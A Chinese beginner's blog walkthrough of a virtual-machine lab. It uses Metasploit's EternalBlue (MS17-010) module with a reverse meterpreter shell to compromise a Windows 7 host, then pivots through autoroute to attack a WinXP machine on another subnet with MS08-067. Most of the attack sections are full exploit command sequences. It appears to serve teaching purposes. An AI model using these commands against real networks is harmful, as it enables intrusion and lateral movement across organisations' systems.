跨网段攻击模拟实验

目录

环境:

 模拟攻击Windows7

跨网段攻击阶段:


前言:初学者在使用漏洞进行攻击时,一般都是在同一网段下,所以这次我们来模拟攻击目标主机后,发现其他网段的主机,而后进行跨网段攻击

环境:

Kali Linux

Windows7

winXP

部署:

这里我们将Kali的网卡设置成NAT模式

Windows7的网卡设置成NAT模式和自定义VMnet模式(双网卡)

WinXP设置成VMnet模式

目的是使kali和Windows7在同一网段,Windows7又和WinXP在同一网段,模拟kali攻击windows7后发现其他网段下的WinXP,从而实施跨网段攻击

kali的IP为192.168.10.137

Windows7的IP地址为:192.168.10.131   和kali在同一网段

                                      172.16.10.129     和WinXP在同一网段

 

Winxp的IP地址为:172.16.10.128   和Windows7在同一网段

 模拟攻击Windows7

 打开msfconsole使用ms17-010永恒之蓝漏洞进行攻击

search ms17-010             #搜索永恒之蓝漏洞
use exploit/windows/smb/ms17_010_eternalblue     #使用攻击模块
set payload windows/x64/meterpreter/reverse_tcp  #设置反向连接
set rhosts 192.168.10.131   #设置目标主机IP(Windows7)
set lhost 192.168.10.137    #设置攻击者IP(Kali)
set lport 3333              #设置连接端口(此处一般默认设置了4444)
run                         #执行攻击

 

攻击成功并拿到shell终端

这里显示乱码,我们使用chcp 65001进行编码

这里看到除了在同网段的192.168.10.131地址,还发现了其他网段的172.16.10.129的地址

那么接下来就是本次的跨网段攻击环节

跨网段攻击阶段:

使用arp -a查看arp缓存表

发现其他网段下的主机172.16.10.128

想必就是WinXP主机的IP地址了(现实中通过更多信息搜集确定操作系统和服务器,在针对性实施对应的攻击)

由于提前知道是WinXP,所以我们使用ms08-67漏洞进行攻击

退回meterpreter:

run autoroute -s 172.16.10.0/24   #添加172.16.10.0/24网段信息
run autoroute -p                  #查看路由信息
background                        #退回msf后台
search ms08-067                   #搜索ms08-067漏洞
use exploit/windows/smb/ms08_067_netapi         #使用攻击模块
set payload windows/meterpreter/bind_tcp        #设置正向连接
set lport 4445                    #设置连接端口
set rhost 172.16.10.128           #设置目标主机IP地址(WinXP)
run                               #执行攻击

 我们好像攻击成功了,让我们验证一下(后渗透)

我们截个图看看

到这里就结束了,以上就是跨网段攻击的演示

嘻嘻

如果有不足,请大佬指正

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值